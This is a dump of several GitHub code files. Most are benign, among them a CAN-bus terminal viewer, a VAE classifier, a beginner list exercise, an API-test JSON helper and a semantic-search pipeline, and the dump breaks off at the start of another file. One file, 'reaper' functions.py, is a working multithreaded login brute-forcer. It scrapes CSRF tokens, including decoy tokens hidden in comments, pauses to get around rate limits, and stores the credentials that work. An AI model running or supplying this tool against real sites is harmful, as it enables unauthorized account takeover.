self.tui.getColumnDescription(col)\n if self.sort == col:\n if self.sortAscending:\n text = \"^\" + text\n else:\n text = \"v\" + text\n else:\n text = \" \" + text\n offset = self.tui.getColumnOffset(col)\n if (offset > 0):\n offset -= 1\n self.window.addstr(0, offset, text, curses.color_pair(TUI.COLOR_HEADER))\n\n self.window.refresh()\n self.drawn = True\n self.tui.lock.release()\n\n def setSort(self, column, ascending):\n self.drawn = False\n self.sort = column\n self.sortAscending = ascending\n self.redraw()\n\nclass MessagesPad():\n def __init__(self, assigned_window, x, y, maxX, maxY, tui):\n self.window = assigned_window\n self.x = x\n self.y = y\n self.maxX = maxX\n self.maxY = maxY\n self.yOffset = 0\n self.tui = tui\n self.messages = [ ]\n self.counts = { }\n self.changes = { }\n self.hilights = { }\n self.sort = None\n self.sortAscending = False\n self.lastMessage = None\n\n def redraw(self):\n i = 0\n for msg in self.messages:\n for col in self.tui.visibleColumns:\n if msg.arbitration_id == self.lastMessage.arbitration_id and col in self.hilights[self.lastMessage.arbitration_id]:\n self.window.addstr(i, self.tui.getColumnOffset(col), str(self.getColumnForMessage(msg, col)), curses.color_pair(TUI.COLOR_MSG_HILIGHT))\n elif col in self.hilights[msg.arbitration_id]:\n self.window.addstr(i, self.tui.getColumnOffset(col), str(self.getColumnForMessage(msg, col)), curses.color_pair(TUI.COLOR_MSG_HILIGHT_OLD))\n else:\n self.window.addstr(i, self.tui.getColumnOffset(col), str(self.getColumnForMessage(msg, col)), curses.color_pair(TUI.COLOR_MSG))\n i += 1\n\n self.window.refresh(self.yOffset, 0, self.x,self.y, self.maxX, self.maxY)\n\n\n def getColumnForMessage(self, message, column):\n if column is TUI.COLUMN_TIMESTAMP:\n return message.timestamp\n elif column is TUI.COLUMN_MSGID:\n return f'{message.arbitration_id:03x}'\n elif column is TUI.COLUMN_BODY_BYTE_0:\n return f'{message.data[0]:02x}'\n elif column is TUI.COLUMN_BODY_BYTE_1:\n return f'{message.data[1]:02x}'\n elif column is TUI.COLUMN_BODY_BYTE_2:\n return f'{message.data[2]:02x}'\n elif column is TUI.COLUMN_BODY_BYTE_3:\n return f'{message.data[3]:02x}'\n elif column is TUI.COLUMN_BODY_BYTE_4:\n return f'{message.data[4]:02x}'\n elif column is TUI.COLUMN_BODY_BYTE_5:\n return f'{message.data[5]:02x}'\n elif column is TUI.COLUMN_BODY_BYTE_6:\n return f'{message.data[6]:02x}'\n elif column is TUI.COLUMN_BODY_BYTE_7:\n return f'{message.data[7]:02x}'\n elif column is TUI.COLUMN_COUNT:\n return str(self.counts[message.arbitration_id])\n elif column is TUI.COLUMN_CHANGES:\n return str(self.changes[message.arbitration_id])\n \n def getColumnIntForMessage(self, message, column):\n if column is TUI.COLUMN_TIMESTAMP:\n return message.timestamp\n elif column is TUI.COLUMN_MSGID:\n return message.arbitration_id\n elif column is TUI.COLUMN_BODY_BYTE_0:\n return message.data[0]\n elif column is TUI.COLUMN_BODY_BYTE_1:\n return message.data[1]\n elif column is TUI.COLUMN_BODY_BYTE_2:\n return message.data[2]\n elif column is TUI.COLUMN_BODY_BYTE_3:\n return message.data[3]\n elif column is TUI.COLUMN_BODY_BYTE_4:\n return message.data[4]\n elif column is TUI.COLUMN_BODY_BYTE_5:\n return message.data[5]\n elif column is TUI.COLUMN_BODY_BYTE_6:\n return message.data[6]\n elif column is TUI.COLUMN_BODY_BYTE_7:\n return message.data[7]\n elif column is TUI.COLUMN_COUNT:\n return self.counts[message.arbitration_id]\n elif column is TUI.COLUMN_CHANGES:\n return self.changes[message.arbitration_id]\n\n def addMessage(self, message):\n 
self.tui.lock.acquire()\n found = False\n i = 0\n for presentMsg in self.messages:\n if presentMsg.arbitration_id == message.arbitration_id:\n # compare messages and check if something has changed\n found = True\n changed = False\n self.hilights[presentMsg.arbitration_id].clear()\n for i in range(0, min(len(presentMsg.data), len(message.data))):\n if str(presentMsg.data[i]) != str(message.data[i]):\n self.hilights[presentMsg.arbitration_id].append(self.tui.COLUMN_BODY_BYTE_0 + i)\n presentMsg.data[i] = message.data[i]\n changed = True\n if changed:\n self.changes[presentMsg.arbitration_id] += 1\n break\n\n if not found:\n self.messages.append(message)\n self.counts[message.arbitration_id] = 0\n self.changes[message.arbitration_id] = 1\n\n if self.sort is not None:\n self.messages.sort(key = lambda x: self.getColumnIntForMessage(x, self.sort), reverse=self.sortAscending)\n\n self.hilights[message.arbitration_id] = [self.tui.COLUMN_TIMESTAMP, self.tui.COLUMN_MSGID, self.tui.COLUMN_COUNT, self.tui.COLUMN_BODY_BYTE_0, self.tui.COLUMN_BODY_BYTE_1, self.tui.COLUMN_BODY_BYTE_2, self.tui.COLUMN_BODY_BYTE_3, self.tui.COLUMN_BODY_BYTE_4, self.tui.COLUMN_BODY_BYTE_5, self.tui.COLUMN_BODY_BYTE_6, self.tui.COLUMN_BODY_BYTE_7]\n\n self.counts[message.arbitration_id] += 1\n self.lastMessage = message\n self.redraw()\n self.tui.lock.release()\n\n def clear(self):\n self.tui.lock.acquire()\n self.messages = [ ]\n self.counts = { }\n self.changes = { }\n self.hilights = { }\n self.window.clear()\n self.redraw()\n self.tui.lock.release()\n\n def setSort(self, column, ascending):\n self.tui.lock.acquire()\n self.sort = column\n self.sortAscending = ascending\n self.messages.sort(key = lambda x: self.getColumnIntForMessage(x, self.sort), reverse=self.sortAscending)\n self.window.clear()\n self.redraw()\n self.tui.lock.release()\n\n\n\nclass TUI():\n COLOR_MENU_SHORTCUT = 1\n COLOR_MENU_DESC = 2\n COLOR_HEADER = 3\n COLOR_MSG = 4\n COLOR_MSG_HILIGHT = 5\n COLOR_MSG_HILIGHT_OLD = 6\n\n COLUMN_TIMESTAMP = 1\n COLUMN_MSGID = 2\n COLUMN_COUNT = 3\n COLUMN_BODY_BYTE_0 = 4\n COLUMN_BODY_BYTE_1 = 5\n COLUMN_BODY_BYTE_2 = 6\n COLUMN_BODY_BYTE_3 = 7 \n COLUMN_BODY_BYTE_4 = 8\n COLUMN_BODY_BYTE_5 = 9\n COLUMN_BODY_BYTE_6 = 10\n COLUMN_BODY_BYTE_7 = 11\n COLUMN_CHANGES = 12\n\n visibleColumns = [COLUMN_MSGID, COLUMN_BODY_BYTE_0, COLUMN_BODY_BYTE_1, COLUMN_BODY_BYTE_2, COLUMN_BODY_BYTE_3, COLUMN_BODY_BYTE_4, COLUMN_BODY_BYTE_5, COLUMN_BODY_BYTE_6, COLUMN_BODY_BYTE_7, COLUMN_COUNT, COLUMN_CHANGES]\n\n def getColumnWidth(self, column):\n if column is TUI.COLUMN_TIMESTAMP:\n return 6\n elif column is TUI.COLUMN_MSGID:\n return 3\n elif column >= TUI.COLUMN_BODY_BYTE_0 and column <= TUI.COLUMN_BODY_BYTE_7:\n return 2\n elif column is TUI.COLUMN_COUNT:\n return 6\n\n def getColumnOffset(self, column):\n totalOffset = 0\n for col in self.visibleColumns:\n if col is column:\n return totalOffset\n totalOffset += self.getColumnWidth(col) + 3\n return -1\n\n def getColumnDescription(self, column):\n if column is TUI.COLUMN_TIMESTAMP:\n return \"Stamp\"\n elif column is TUI.COLUMN_MSGID:\n return \"ID\"\n elif column is TUI.COLUMN_COUNT:\n return \"COUNT\"\n elif column is TUI.COLUMN_BODY_BYTE_0:\n return \"B0\"\n elif column is TUI.COLUMN_BODY_BYTE_1:\n return \"B1\"\n elif column is TUI.COLUMN_BODY_BYTE_2:\n return \"B2\"\n elif column is TUI.COLUMN_BODY_BYTE_3:\n return \"B3\"\n elif column is TUI.COLUMN_BODY_BYTE_4:\n return \"B4\"\n elif column is TUI.COLUMN_BODY_BYTE_5:\n return \"B5\"\n elif column is TUI.COLUMN_BODY_BYTE_6:\n 
return \"B6\"\n elif column is TUI.COLUMN_BODY_BYTE_7:\n return \"B7\"\n elif column is TUI.COLUMN_CHANGES:\n return \"CHANGES\"\n\n\n def __init__(self):\n self.maxMessages = 256\n self.lock = threading.RLock()\n self.lock.acquire()\n self.sortBy = None\n self.sortAscending = False\n\n self.bottomMenu = BottomMenu(curses.newwin(1, curses.COLS, curses.LINES - 2, 0), self)\n self.messagesPad = MessagesPad(curses.newpad(self.maxMessages, curses.COLS - 2), 1, 0, curses.LINES - 3, curses.COLS - 2, self)\n self.messagesHeader = MessagesHeader(curses.newwin(1, curses.COLS, 0, 0), self)\n curses.init_pair(self.COLOR_MENU_SHORTCUT, curses.COLOR_WHITE, curses.COLOR_BLACK)\n curses.init_pair(self.COLOR_MENU_DESC, curses.COLOR_BLACK, curses.COLOR_CYAN)\n curses.init_pair(self.COLOR_HEADER, curses.COLOR_BLACK, curses.COLOR_GREEN)\n curses.init_pair(self.COLOR_MSG, curses.COLOR_WHITE, curses.COLOR_BLACK)\n curses.init_pair(self.COLOR_MSG_HILIGHT_OLD, curses.COLOR_RED, curses.COLOR_BLACK)\n curses.init_pair(self.COLOR_MSG_HILIGHT, curses.COLOR_BLACK, curses.COLOR_RED)\n\n self.lock.release()\n\n\n def redraw(self):\n self.lock.acquire()\n self.bottomMenu.redraw()\n self.messagesHeader.redraw()\n self.messagesPad.redraw()\n self.lock.release()\n\n def addMessage(self, message):\n self.lock.acquire()\n self.messagesPad.addMessage(message)\n self.lock.release()\n\n def nextSort(self):\n if self.sortBy is None:\n self.sortBy = 0\n else:\n self.sortBy += 1\n\n if self.sortBy >= len(self.visibleColumns):\n self.sortAscending = not self.sortAscending\n self.sortBy = 0\n\n self.messagesPad.setSort(self.visibleColumns[self.sortBy], self.sortAscending)\n self.messagesHeader.setSort(self.visibleColumns[self.sortBy], self.sortAscending)\n\n\ndef canReaderThread(can_interface, tui):\n for message in can.interface.Bus(channel = can_interface, bustype = bustype):\n tui.addMessage(message)\n\n\ndef canReader(can_interface):\n for message in can.interface.Bus(channel = can_interface, bustype = bustype):\n print(message)\n\n\n\n\ndef main():\n if len(sys.argv) < 2 or sys.argv[1] is None:\n print(\"Usage: {} \".format(sys.argv[0]))\n return\n# canReader(sys.argv[1])\n curses.wrapper(cursesMain)\n\n\n\ndef cursesMain(stdscr):\n curses.noecho()\n curses.cbreak()\n stdscr.keypad(True)\n stdscr.timeout(0)\n run = True\n\n tui = TUI()\n\n canThread = threading.Thread(target = canReaderThread, args=(sys.argv[1], tui, ))\n canThread.start()\n\n stdscr.refresh()\n tui.redraw()\n while run:\n tui.lock.acquire()\n k = stdscr.getch()\n tui.lock.release()\n\n if k == curses.KEY_F10:\n run = False\n elif k == curses.KEY_F5:\n tui.messagesPad.window.clear()\n elif k == curses.KEY_F6:\n tui.nextSort()\n elif k == curses.KEY_F8:\n tui.messagesPad.clear()\n \n elif k == curses.KEY_UP:\n if tui.messagesPad.yOffset >= 1:\n tui.messagesPad.yOffset -= 1\n if k == curses.KEY_DOWN:\n tui.messagesPad.yOffset += 1\n tui.redraw()\n time.sleep(0.01)\n\n canThread.join()\n\n\n\nmain()\n","repo_name":"Mrkvak/cx30-can","sub_path":"scripts/canview.py","file_name":"canview.py","file_ext":"py","file_size_in_byte":13637,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"40208701008","text":"from torch import nn\nfrom models.pretrain.vae import Encoder\n\n\nclass VAEZClassifier(nn.Module):\n\n def __init__(self, n_classes=1000):\n super(VAEZClassifier,self).__init__()\n\n self.encoder = Encoder()\n\n self.fc1 = nn.Linear(self.encoder.z_dim, 512)\n self.relu = nn.ReLU()\n self.drop = 
nn.Dropout(0.2)\n self.fc2 = nn.Linear(512, n_classes)\n self.lsm = nn.LogSoftmax(dim=1)\n\n def forward(self ,x):\n # bs x 16 x 88 x 88\n z, mu, logvar = self.encoder(x)\n\n x = self.fc1(z)\n x = self.relu(x)\n x = self.drop(x)\n x = self.fc2(x)\n x = self.lsm(x)\n return x\n\n # If our particular model needs to do anything special to transform the image we can specify it here\n # will need to copy this over to eval.py if we do anything special\n transform = Encoder.transform\n\n\n","repo_name":"settonull/zoc-ssic","sub_path":"models/classifier/vae_z_classifier.py","file_name":"vae_z_classifier.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30805652740","text":"# encontrar el segundo valor mas grande de un arreglo\r\n\r\n# se crea una lista\r\nlista = [10, 2, 24, 37, 847, 36, 10, 92]\r\n# se define un numero mayor, en este caso, la posicion 0 del arreglo\r\nmayor = lista[0]\r\n# se define un segundo numero mayor que tambien sera en la posicion 0\r\nmayordos = lista[0]\r\n# Ahora realizamos un ciclo for para iterar sobre cada uno de los espacios en el arreglo y comparamos si el numero en\r\n# esa posicion es mayor que la variable mayor, lo reemplazamos, esto solo para tener como referencia un numero mayor\r\n# y poder proseguir con la comparacion del segundo numero\r\nfor i in lista:\r\n if i > mayor:\r\n mayor = i\r\n# ahora creamos un segundo ciclo para verificar un numero que sea menor al numero mayor, pero que sea mayor al\r\n# numero que estemos iterando, en este caso iniciamos con el numero en la posicion 0, que es 10. y vamos reemplazando\r\n# el valor de \"mayordos\".\r\nfor i in lista:\r\n if i < mayor and i > mayordos:\r\n mayordos = i\r\n# por ultimo imprimimos el segundo numero mayor, en este caso yo imprimi los dos\r\nprint(\"el numero mayor del arreglo es: {} y el segundo numero mayor es: {}\".format(mayor, mayordos))\r\n\r\n#","repo_name":"mastergamer1309/trabajosUni","sub_path":"Python/pruebas.py","file_name":"pruebas.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1120752296","text":"from lib.operationJson import operetionJson\nfrom lib.getRandomData import RandomNumber\nimport re\nclass openrationDict:\n \"\"\"\n 这是一个解析dict参数的类,\n 可用于多参数的指定key,指定key集合解析key,更新指定key的值\n \"\"\"\n def __init__(self):\n self.oj=operetionJson()\n self.rn=RandomNumber()\n def get_value(self,my_dict,key):\n \"\"\"\n 这是一个递归函数\n :param my_dict: 传入的字典\n :param key: 字典中的key\n :return:返回字典中某个key对应的值\n \"\"\"\n try:\n if isinstance(my_dict,dict):\n if my_dict.get(key)or my_dict.get(key)==0 or my_dict.get(key)==''\\\n and my_dict.get(key) is False:\n return my_dict.get(key)\n for my_dict_key in my_dict:\n if self.get_value(my_dict.get(my_dict_key),key)or\\\n self.get_value(my_dict.get(my_dict_key),key)is False:\n return self.get_value(my_dict.get(my_dict_key),key)\n if isinstance(my_dict,list):\n for my_dict_arr in my_dict:\n if self.get_value(my_dict_arr,key)\\\n or self.get_value(my_dict_arr,key)is False:\n return self.get_value(my_dict_arr,key)\n except Exception as el:\n print(el)\n def get_response_date(self,res,extract_data):\n \"\"\"\n 通过响应数据中的key,获取value并写入json文件\n :param res: 接口返回数据\n :param extract_data: 要提取的数据\n :return:返回一个字典\n \"\"\"\n if isinstance(extract_data,str):\n extract_data=eval(extract_data)\n for key,extract_content in extract_data .items():\n global write_dict\n 
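# collect the storage names and the matching values pulled from the response, then zip them into write_dict\n            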
key_list=[]\n value_list=[]\n if key==\"extractBody\":\n for key ,value in extract_content.items():\n key_list.append(value)\n value_list.append(self.get_value(res,key))\n print(\"获取提取字段:{0},提取值:{1}\".format(key, self.get_value(res,key)))\n write_dict = dict(zip(key_list, value_list))\n print(\"写入.json文件成功,写入字段:{0},写入值:{1}\".format(value, self.get_value(res, key)))\n self.oj.write_data(write_dict)#写入json文件\n def update_request_data(self,api_dict):\n \"\"\"\n\n :param api_dict:原有请求入参\n :return:更新的的入参\n \"\"\"\n extract_dict = re.findall(r\"[$]{(.+?)}\", str(api_dict))\n if len(extract_dict) > 0:\n for key in range(len(extract_dict)):\n extract_dict_key = extract_dict[key]\n old = \"${\" + extract_dict_key + \"}\"\n if \"random\" in extract_dict_key:\n random_id = extract_dict_key.split(\"_\")[1]\n new = self.rn.getRandomDate(random_id)\n api_dict = eval(str(api_dict).replace(old, str(new)))\n else:\n new = self.oj.get_data(extract_dict_key)\n api_dict = eval(str(api_dict).replace(old, str(new)))\n return api_dict","repo_name":"13717888314/TestAutoJzh","sub_path":"lib/operationDict.py","file_name":"operationDict.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29598187001","text":"import os\nimport re\nimport hnswlib\nimport pathlib\nimport logging\nimport traceback\nimport numpy as np\nimport pandas as pd\nimport textdistance\nfrom sentence_transformers import SentenceTransformer, util\n\n\nlogging.basicConfig(level=logging.INFO)\n\n\nclass SearchDescriptionPipeline:\n \"\"\" Search Engine Pipeline \"\"\"\n def __init__(self, \n semantic_search_topk:int=10,\n keyword_search_topk:int=2,\n embedding_model_name:str='all-mpnet-base-v2', \n hardware_device='cpu') -> None:\n \n self.description_text = \"\"\n self.embedding_size = 768\n self.semantic_search_top_k = semantic_search_topk\n self.keyword_search_top_k = keyword_search_topk\n self.keyword_similarity_threshold = 0.85\n self.embedding_model_name = embedding_model_name\n self.hardware_device = hardware_device\n self.current_directory = pathlib.Path().resolve()\n self.description_dataset_path = os.path.join(self.current_directory, 'superhero_desc_updated.gzip')\n self.hnsw_index_path = os.path.join(self.current_directory, 'hnswlib.index')\n \n logging.info(f'Loading Artifacts ...')\n \n # check if the following files available:\n for item in [self.description_dataset_path, self.hnsw_index_path]:\n if not os.path.exists(item):\n logging.error(f'File: {item} Not Found in the location. Please check!')\n \n # Load the necessary artifacts:\n self.description_data = pd.read_parquet(self.description_dataset_path)\n self.hnsw_index = hnswlib.Index(space = 'cosine', dim = self.embedding_size)\n \n logging.info(f'Dataset Exists: {os.path.exists(self.description_dataset_path)}\\nHNSW Index Exists: {os.path.exists(self.hnsw_index_path)}')\n \n logging.info(\"Loading HNSW index for Semantic Search\")\n self.hnsw_index.load_index(self.hnsw_index_path)\n \n logging.info(f'Loaded HNSW Index. 
Now Setting EFT')\n \n # Controlling the recall by setting ef:\n # ef should always be > top_k_hits\n self.hnsw_index.set_ef(50)\n \n logging.info(\"Loading Embedding Model for Vectorisation\")\n self.embedding_model = SentenceTransformer(self.embedding_model_name, \n device=self.hardware_device)\n \n logging.info(f'Done!')\n \n \n def text_similarity(self, keyword:str, text_token:str) -> int:\n # Compute text similarity between keyword and description word token\n sim = textdistance.ratcliff_obershelp.normalized_similarity(keyword, text_token)\n return 1 if sim >= self.keyword_similarity_threshold else 0\n \n \n def tokenisation(self, text:str) -> list:\n # Clean words and tokenise the text\n text = re.sub(' ', '-', text)\n text = text.split(',')\n clean_text = []\n for token in text:\n if token.startswith('-'):\n clean_text.append(token.replace('-', ''))\n else:\n clean_text.append(token)\n text = re.sub('-', ' ', \" \".join(clean_text))\n return text.split(' ')\n \n \n def run_semantic_search(self) -> list:\n \n # Perform semantic search and get the document ids\n \n inp_hero_des_embedding = self.embedding_model.encode(self.description_text)\n corpus_ids, distances = self.hnsw_index.knn_query(inp_hero_des_embedding, \n k=self.semantic_search_top_k)\n \n hits = [{'corpus_id': id, 'score': 1-score} for id, score in zip(corpus_ids[0], distances[0])]\n hits = sorted(hits, key=lambda x: x['score'], reverse=True)\n \n doc_ids = []\n for hit in hits[0:self.semantic_search_top_k]:\n doc_ids.append(hit['corpus_id'])\n return doc_ids\n \n \n def run_keyword_search(self, doc_ids:list) -> list:\n # Build a dictionary which has {'document id': Number of keywords present}\n \n freq_score_board = {}\n \n input_desc_keywords = self.description_text.split(',')\n \n # take a input description keyword and search it in the exiting description dataset\n \n for row_index in doc_ids:\n des_doc = self.description_data.iloc[row_index]['hero_description']\n des_doc_tokens = self.tokenisation(des_doc)\n bit_arry = []\n for key in input_desc_keywords:\n for des_doc_token in des_doc_tokens:\n bit_arry.append(self.text_similarity(keyword=key, text_token=des_doc_token))\n \n freq_score_board[row_index] = sum(bit_arry)\n \n sorted_freq = {k: v for k, v in sorted(freq_score_board.items(), \n key=lambda item: item[1], reverse=True)}\n \n superhero_names = []\n for index, doc_id in enumerate(sorted_freq.keys()):\n if index >= self.keyword_search_top_k:\n break\n superhero_names.append(self.description_data.iloc[doc_id]['hero_name'])\n return superhero_names\n \n \n def run_pipeline(self, description_text: str) -> list:\n self.description_text = description_text.lower()\n document_ids = self.run_semantic_search()\n result = self.run_keyword_search(doc_ids = document_ids)\n return result\n \n\nif __name__ == '__main__':\n # device = mps for Apple M1 Macs\n search_pipeline = SearchDescriptionPipeline(hardware_device='cpu')\n input_dec = 'marvel comics, male, hero, spider powers, new york city, super strength, durability, enhanced senses'\n superhero_guess = search_pipeline.run_pipeline(description_text=input_dec)\n print(f'Input Description: {input_dec}\\nGuess: {superhero_guess}')\n ","repo_name":"RahulNenavath/Guess-The-Hero","sub_path":"Code/src/search_pipeline.py","file_name":"search_pipeline.py","file_ext":"py","file_size_in_byte":5893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24492190404","text":"import sys,requests,re,time,os,threading,queue\nfrom 
bs4 import BeautifulSoup as Soup\n\n#---variables---\nthreads = []\nt = 0\ncreds_index = 1\nlock = threading.Lock()\nevent = threading.Event()\n\n#set the flag to true\nevent.set()\n\nclass mythread (threading.Thread):\n\t#initialize mythread subclass\n\tdef __init__(self, name, Q, urlQ, number_of_tries, time_to_sleep, save, second_way, page, threadlist, parameters_list):\n\t\t#invoke the base class (Thread) constructor\n\t\tthreading.Thread.__init__(self)\n\t\tself.Q = Q\n\t\tself.urlQ = urlQ\n\t\tself.number_of_tries = number_of_tries\n\t\tself.time_to_sleep = time_to_sleep\n\t\tself.save = save\n\t\tself.second_way = second_way\n\t\tself.page = page\n\t\tself.threadlist = threadlist\n\t\tself.parameters_list = parameters_list\n\t#the functions that each thread runs when started\n\tdef run(self):\n\t\tprint(self.name, \"started\")\n\t\t#call the process function\n\t\tprocess(self.name, self.Q, self.urlQ, self.number_of_tries, self.time_to_sleep, self.save, self.second_way, self.page, self.parameters_list)\n\t\tprint(\"Exit\", self.name)\n\t\t#append the thread which finished to the threads list\n\t\tthreads.append(self.name)\n\t\t#call the finish function\n\t\tfinish(self.threadlist, self.save)\n\ndef process(threadName, Q, urlQ, number_of_tries, time_to_sleep, save, second_way, page, parameters_list):\n\t#check if the Q queue is empty---\n\twhile not Q.empty():\n\t\t#---if there are more than 1 url in the urlQ---\n\t\tif urlQ.qsize() > 1:\n\t\t\t#get a url from the urlQ\n\t\t\turl = urlQ.get()\n\t\t\t#do for every item in the parameters list\n\t\t\tfor i in parameters_list:\n\t\t\t\t#check if sleeping is set\n\t\t\t\tif time_to_sleep != 0:\n\t\t\t\t\t#check if the thread should sleep\n\t\t\t\t\tif parameters_list.index(i) != 0 and parameters_list.index(i) % int(number_of_tries) == 0:\n\t\t\t\t\t\tprint(threadName, \"sleeping for\", time_to_sleep, \"seconds\")\n\t\t\t\t\t\ttime.sleep(int(time_to_sleep))\n\t\t\t\t\t\tprint(threadName, \"awake\")\n\t\t\t\tprint(threadName, \"processing item %s url: %s\" % (parameters_list.index(i) + 1, url))\n\t\t\t\t#call the parametersfunc function\n\t\t\t\tparametersfunc(threadName, i, url, save, second_way, page)\n\t\t#---if there is one url in the urlQ---\n\t\telse:\n\t\t\tif urlQ.qsize() == 1:\n\t\t\t\t#get the url from the urlQ\n\t\t\t\turl = urlQ.get()\n\t\t\t\t#put url back in urlQ so other threads can use it\n\t\t\t\turlQ.put(url)\n\t\t\t#check if sleeping is set\n\t\t\tif time_to_sleep != 0:\n\t\t\t\t#lock here so the other threads can't continue and have to wait for your sleep\n\t\t\t\tlock.acquire()\n\t\t\t\tglobal t\n\t\t\t\t#check if the thread should sleep\n\t\t\t\tif t != 0 and t % int(number_of_tries) == 0:\n\t\t\t\t\t#check if Q is empty so not to sleep unnecessarily\n\t\t\t\t\tif Q.empty():\n\t\t\t\t\t\tlock.release()\n\t\t\t\t\t\treturn\n\t\t\t\t\tt += 1\n\t\t\t\t\tprint(threadName, \"sleeping for\", time_to_sleep, \"seconds\")\n\t\t\t\t\ttime.sleep(int(time_to_sleep))\n\t\t\t\t\tprint(threadName, \"awake\")\n\t\t\t\t\tlock.release()\n\t\t\t\telse:\n\t\t\t\t\tt += 1\n\t\t\t\t\tlock.release()\n\t\t\t#wait until the flag is true (if true return immediately)\n\t\t\tevent.wait()\n\t\t\t#set the flag to false so that the other threads wait for this thread to check if Q is empty\n\t\t\tevent.clear()\n\t\t\t#check again if Q is empty\n\t\t\tif Q.empty():\n\t\t\t\t#set the flag to true so the other threads can continue\n\t\t\t\tevent.set()\n\t\t\t\t#return from the function\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\t#get the parameters from the 
Q\n\t\t\t\tparameters = Q.get()\n\t\t\t#set the flag to true so the other threads can continue\n\t\t\tevent.set()\n\t\t\tglobal creds_index\n\t\t\tprint(threadName, \"processing item %s url: %s\" % (creds_index, url))\n\t\t\tcreds_index += 1\n\t\t\t#call the parametersfunc function\n\t\t\tparametersfunc(threadName, parameters, url, save, second_way, page)\n\ndef parametersfunc(threadName, p, url, save, second_way, page):\n\t#set some variables\n\tparameters = {}\n\t#make the parameters a list\n\tparameters_list = p.split(\"/\")\n\t#make parameters list a dictionary (needed from the requests module)\n\tfor i in range(0,len(parameters_list)):\n\t\tpara = parameters_list[i].split(\"=\")\n\t\tparameters[para[0]] = para[1]\n\t#make a url get request to get the cookies and the csrf token\n\treq = requests.get(url)\n\t#extract the cookies\n\tcookie = req.cookies\n\t#extract the csrf token and add it to parameters\n\t#if the csrf token is embedded in the HTML:\n\tfor key, value in parameters.items():\n\t\tif value == \"TOKEN\":\n\t\t\thtml = req.text\n\t\t\tsoup = Soup(html, 'lxml')\n\t\t\ttry:\n\t\t\t\tcsrf_token = soup.find_all(attrs={ \"name\" : key })[0].get('value')\n\t\t\texcept IndexError:\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\t#replace TOKEN with the csrf_token\n\t\t\t\tparameters[key] = csrf_token\n\t#if the csrf token is in a script:\n\tfor key, value in parameters.items():\n\t\tif value == \"SCRIPT\":\n\t\t\thtml = req.text\n\t\t\tcsrf_token = \"\"\n\t\t\ttry:\n\t\t\t\t#search the html text for the csrf_token\n\t\t\t\tre.search(key + \".*?value.*?=.*?\\w.*?;\", html)\n\t\t\texcept IndexError:\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\t#find all accounts of csrf_token in the html text (there might be more than one if\n\t\t\t\t#the site has included more as comments)\n\t\t\t\tcsrf_token1 = re.findall(key + \".*?value.*?=.*?\\w.*?;\", html)\n\t\t\t\t#if there are comments to fool Reaper\n\t\t\t\tif len(csrf_token1) > 1:\n\t\t\t\t\t#make a second get request\n\t\t\t\t\treq = requests.get(url)\n\t\t\t\t\t#extract the cookies again cause they change with each request\n\t\t\t\t\tcookie = req.cookies\n\t\t\t\t\thtml = req.text\n\t\t\t\t\t#find all the accounts of csrf_token in the html text again\n\t\t\t\t\tcsrf_token2 = re.findall(key + \".*?value.*?=.*?\\w.*?;\", html)\n\t\t\t\t\t#cross-check the results and remove those which are the same\n\t\t\t\t\tfor i in csrf_token1:\n\t\t\t\t\t\tfor j in csrf_token2:\n\t\t\t\t\t\t\tif i == j:\n\t\t\t\t\t\t\t\tcsrf_token1.remove(i)\n\t\t\t\t#token should be a list with 2 items (the csrf_token is included in the 2nd item)\n\t\t\t\ttoken = str(csrf_token1).split(\"=\")\n\t\t\t\ttry:\n\t\t\t\t\ttoken[1]\n\t\t\t\texcept IndexError:\n\t\t\t\t\treturn\n\t\t\t\telse:\n\t\t\t\t\t#get only the alphanumeric characters from the token\n\t\t\t\t\tfor i in token[1]:\n\t\t\t\t\t\tif i.isalnum():\n\t\t\t\t\t\t\tcsrf_token += i\n\t\t\t\t#replace TOKEN with the csrf_token\n\t\t\t\tparameters[key] = csrf_token\n\trequest(url, cookie, parameters, page, second_way, save)\n\ndef request(url, cookie, parameters, page, second_way, save):\n\t#make the post request and parse the results\n\treq = requests.post(url, cookies=cookie, data=parameters)\n\t#find and write into a file any successful attempts\n\t#second_way: check if the same parameters exist in the page served after the request\n\tif second_way != 0:\n\t\thtml = req.text\n\t\tsoup = Soup(html, 'lxml')\n\t\tfor key, value in parameters.items():\n\t\t\ttry:\n\t\t\t\tsoup.find_all(attrs={ \"name\" : key })[0]\n\t\t\texcept 
IndexError:\n\t\t\t\tprint (\"Found valid credentials: %s , %s\" % (url, parameters))\n\t\t\t\tglobal pas2\n\t\t\t\t#write the successful attempts in the file\n\t\t\t\tpas2 = open(save,'a')\n\t\t\t\tpas2.write('%s\\n' % (parameters))\n\t\t\t\tpas2.close()\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\treturn\n\t#default way: check the url of the page served after the request\n\tif req.url == (url + \"/\") or req.url == url or req.url == page:\n\t\tpass\n\telse:\n\t\tprint (\"Found valid credentials: %s , %s\" % (url, parameters))\n\t\tglobal pas\n\t\t#write the successful attempts in the file\n\t\tpas = open(save,'a')\n\t\tpas.write('%s\\n' %(parameters))\n\t\tpas.close()\n\ndef finish(threadlist, save):\n\t#check if all the threads finished\n\tif len(threads) == len(threadlist):\n\t\tprint(\"All threads exited\")\n\t\ttry:\n\t\t\tpas\n\t\texcept NameError:\n\t\t\ttry:\n\t\t\t\tpas2\n\t\t\texcept NameError:\n\t\t\t\tprint(\"No valid credentials found\")\n\t\t\telse:\n\t\t\t\tprint('The valid credentials have been stored to ' + save)\n\t\telse:\n\t\t\tprint('The valid credentials have been stored to ' + save)\n","repo_name":"konsaranto/reaper","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":7370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"41965265632","text":"import uuid\nfrom functools import lru_cache\nfrom typing import Optional\n\nfrom services.base import BaseSearch\nfrom services.cache import cache\nfrom services.elastic import 